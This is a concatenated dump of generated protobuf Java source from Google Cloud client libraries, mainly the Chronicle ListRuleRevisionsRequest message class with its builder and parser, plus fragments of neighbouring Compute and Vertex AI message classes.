com.google.protobuf.Parser<RegionInstanceGroupManagerPatchInstanceConfigReq> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,775
java-chronicle/proto-google-cloud-chronicle-v1/src/main/java/com/google/cloud/chronicle/v1/ListRuleRevisionsRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/chronicle/v1/rule.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.chronicle.v1; /** * * * <pre> * Request message for ListRuleRevisions method. * </pre> * * Protobuf type {@code google.cloud.chronicle.v1.ListRuleRevisionsRequest} */ public final class ListRuleRevisionsRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.chronicle.v1.ListRuleRevisionsRequest) ListRuleRevisionsRequestOrBuilder { private static final long serialVersionUID = 0L; // Use ListRuleRevisionsRequest.newBuilder() to construct. 
private ListRuleRevisionsRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListRuleRevisionsRequest() { name_ = ""; pageToken_ = ""; view_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListRuleRevisionsRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.class, com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.Builder.class); } public static final int NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object name_ = ""; /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ @java.lang.Override public java.lang.String getName() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } } /** * * * <pre> * Required. The name of the rule to list revisions for. 
* Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ @java.lang.Override public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int PAGE_SIZE_FIELD_NUMBER = 2; private int pageSize_ = 0; /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. * </pre> * * <code>int32 page_size = 2;</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } public static final int PAGE_TOKEN_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object pageToken_ = ""; /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The pageToken. */ @java.lang.Override public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. 
* * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The bytes for pageToken. */ @java.lang.Override public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int VIEW_FIELD_NUMBER = 4; private int view_ = 0; /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The enum numeric value on the wire for view. */ @java.lang.Override public int getViewValue() { return view_; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The view. */ @java.lang.Override public com.google.cloud.chronicle.v1.RuleView getView() { com.google.cloud.chronicle.v1.RuleView result = com.google.cloud.chronicle.v1.RuleView.forNumber(view_); return result == null ? 
com.google.cloud.chronicle.v1.RuleView.UNRECOGNIZED : result; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, name_); } if (pageSize_ != 0) { output.writeInt32(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, pageToken_); } if (view_ != com.google.cloud.chronicle.v1.RuleView.RULE_VIEW_UNSPECIFIED.getNumber()) { output.writeEnum(4, view_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, name_); } if (pageSize_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, pageToken_); } if (view_ != com.google.cloud.chronicle.v1.RuleView.RULE_VIEW_UNSPECIFIED.getNumber()) { size += com.google.protobuf.CodedOutputStream.computeEnumSize(4, view_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.chronicle.v1.ListRuleRevisionsRequest)) { return super.equals(obj); } com.google.cloud.chronicle.v1.ListRuleRevisionsRequest other = 
(com.google.cloud.chronicle.v1.ListRuleRevisionsRequest) obj; if (!getName().equals(other.getName())) return false; if (getPageSize() != other.getPageSize()) return false; if (!getPageToken().equals(other.getPageToken())) return false; if (view_ != other.view_) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + NAME_FIELD_NUMBER; hash = (53 * hash) + getName().hashCode(); hash = (37 * hash) + PAGE_SIZE_FIELD_NUMBER; hash = (53 * hash) + getPageSize(); hash = (37 * hash) + PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getPageToken().hashCode(); hash = (37 * hash) + VIEW_FIELD_NUMBER; hash = (53 * hash) + view_; hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest 
parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, 
extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.chronicle.v1.ListRuleRevisionsRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for ListRuleRevisions method. * </pre> * * Protobuf type {@code google.cloud.chronicle.v1.ListRuleRevisionsRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.chronicle.v1.ListRuleRevisionsRequest) com.google.cloud.chronicle.v1.ListRuleRevisionsRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.class, com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.Builder.class); } // Construct using com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; name_ = 
""; pageSize_ = 0; pageToken_ = ""; view_ = 0; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_descriptor; } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest getDefaultInstanceForType() { return com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest build() { com.google.cloud.chronicle.v1.ListRuleRevisionsRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest buildPartial() { com.google.cloud.chronicle.v1.ListRuleRevisionsRequest result = new com.google.cloud.chronicle.v1.ListRuleRevisionsRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.chronicle.v1.ListRuleRevisionsRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.name_ = name_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.pageSize_ = pageSize_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.pageToken_ = pageToken_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.view_ = view_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } 
@java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.chronicle.v1.ListRuleRevisionsRequest) { return mergeFrom((com.google.cloud.chronicle.v1.ListRuleRevisionsRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.chronicle.v1.ListRuleRevisionsRequest other) { if (other == com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.getDefaultInstance()) return this; if (!other.getName().isEmpty()) { name_ = other.name_; bitField0_ |= 0x00000001; onChanged(); } if (other.getPageSize() != 0) { setPageSize(other.getPageSize()); } if (!other.getPageToken().isEmpty()) { pageToken_ = other.pageToken_; bitField0_ |= 0x00000004; onChanged(); } if (other.view_ != 0) { setViewValue(other.getViewValue()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { name_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 16: { pageSize_ = input.readInt32(); bitField0_ |= 0x00000002; break; } // case 16 case 26: { pageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; 
} // case 26 case 32: { view_ = input.readEnum(); bitField0_ |= 0x00000008; break; } // case 32 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object name_ = ""; /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ public java.lang.String getName() { java.lang.Object ref = name_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... 
} * </code> * * @param value The name to set. * @return This builder for chaining. */ public Builder setName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearName() { name_ = getDefaultInstance().getName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for name to set. * @return This builder for chaining. */ public Builder setNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private int pageSize_; /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. * </pre> * * <code>int32 page_size = 2;</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. 
* </pre> * * <code>int32 page_size = 2;</code> * * @param value The pageSize to set. * @return This builder for chaining. */ public Builder setPageSize(int value) { pageSize_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. * </pre> * * <code>int32 page_size = 2;</code> * * @return This builder for chaining. */ public Builder clearPageSize() { bitField0_ = (bitField0_ & ~0x00000002); pageSize_ = 0; onChanged(); return this; } private java.lang.Object pageToken_ = ""; /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The pageToken. */ public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The bytes for pageToken. 
*/ public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @param value The pageToken to set. * @return This builder for chaining. */ public Builder setPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return This builder for chaining. */ public Builder clearPageToken() { pageToken_ = getDefaultInstance().getPageToken(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @param value The bytes for pageToken to set. * @return This builder for chaining. 
*/ public Builder setPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private int view_ = 0; /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The enum numeric value on the wire for view. */ @java.lang.Override public int getViewValue() { return view_; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @param value The enum numeric value on the wire for view to set. * @return This builder for chaining. */ public Builder setViewValue(int value) { view_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The view. */ @java.lang.Override public com.google.cloud.chronicle.v1.RuleView getView() { com.google.cloud.chronicle.v1.RuleView result = com.google.cloud.chronicle.v1.RuleView.forNumber(view_); return result == null ? com.google.cloud.chronicle.v1.RuleView.UNRECOGNIZED : result; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @param value The view to set. * @return This builder for chaining. 
*/ public Builder setView(com.google.cloud.chronicle.v1.RuleView value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000008; view_ = value.getNumber(); onChanged(); return this; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return This builder for chaining. */ public Builder clearView() { bitField0_ = (bitField0_ & ~0x00000008); view_ = 0; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.chronicle.v1.ListRuleRevisionsRequest) } // @@protoc_insertion_point(class_scope:google.cloud.chronicle.v1.ListRuleRevisionsRequest) private static final com.google.cloud.chronicle.v1.ListRuleRevisionsRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.chronicle.v1.ListRuleRevisionsRequest(); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListRuleRevisionsRequest> PARSER = new com.google.protobuf.AbstractParser<ListRuleRevisionsRequest>() { @java.lang.Override public ListRuleRevisionsRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } 
catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListRuleRevisionsRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListRuleRevisionsRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,925
java-aiplatform/proto-google-cloud-aiplatform-v1beta1/src/main/java/com/google/cloud/aiplatform/v1beta1/PostStartupScriptConfig.java
/*
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
// Generated by the protocol buffer compiler.  DO NOT EDIT!
// source: google/cloud/aiplatform/v1beta1/notebook_software_config.proto

// Protobuf Java Version: 3.25.8
package com.google.cloud.aiplatform.v1beta1;

// NOTE(review): machine-generated protobuf message class; regenerate from the .proto
// rather than editing. Comments below are reviewer annotations only; all code tokens
// are unchanged from the generated output.
/** Protobuf type {@code google.cloud.aiplatform.v1beta1.PostStartupScriptConfig} */
public final class PostStartupScriptConfig extends com.google.protobuf.GeneratedMessageV3
    implements
    // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig)
    PostStartupScriptConfigOrBuilder {
  private static final long serialVersionUID = 0L;

  // Use PostStartupScriptConfig.newBuilder() to construct.
  private PostStartupScriptConfig(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
    super(builder);
  }

  private PostStartupScriptConfig() {
    postStartupScript_ = "";
    postStartupScriptUrl_ = "";
    postStartupScriptBehavior_ = 0;
  }

  @java.lang.Override
  @SuppressWarnings({"unused"})
  protected java.lang.Object newInstance(UnusedPrivateParameter unused) {
    return new PostStartupScriptConfig();
  }

  public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
    return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto
        .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_descriptor;
  }

  @java.lang.Override
  protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
      internalGetFieldAccessorTable() {
    return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto
        .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_fieldAccessorTable
        .ensureFieldAccessorsInitialized(
            com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.class,
            com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.Builder.class);
  }

  /**
   * Protobuf enum {@code
   * google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior}
   */
  public enum PostStartupScriptBehavior implements com.google.protobuf.ProtocolMessageEnum {
    /** <code>POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED = 0;</code> */
    POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED(0),
    /** <code>RUN_ONCE = 1;</code> */
    RUN_ONCE(1),
    /** <code>RUN_EVERY_START = 2;</code> */
    RUN_EVERY_START(2),
    /** <code>DOWNLOAD_AND_RUN_EVERY_START = 3;</code> */
    DOWNLOAD_AND_RUN_EVERY_START(3),
    // Sentinel for wire values not known to this generated code version.
    UNRECOGNIZED(-1),
    ;

    /** <code>POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED = 0;</code> */
    public static final int POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED_VALUE = 0;

    /** <code>RUN_ONCE = 1;</code> */
    public static final int RUN_ONCE_VALUE = 1;

    /** <code>RUN_EVERY_START = 2;</code> */
    public static final int RUN_EVERY_START_VALUE = 2;

    /** <code>DOWNLOAD_AND_RUN_EVERY_START = 3;</code> */
    public static final int DOWNLOAD_AND_RUN_EVERY_START_VALUE = 3;

    public final int getNumber() {
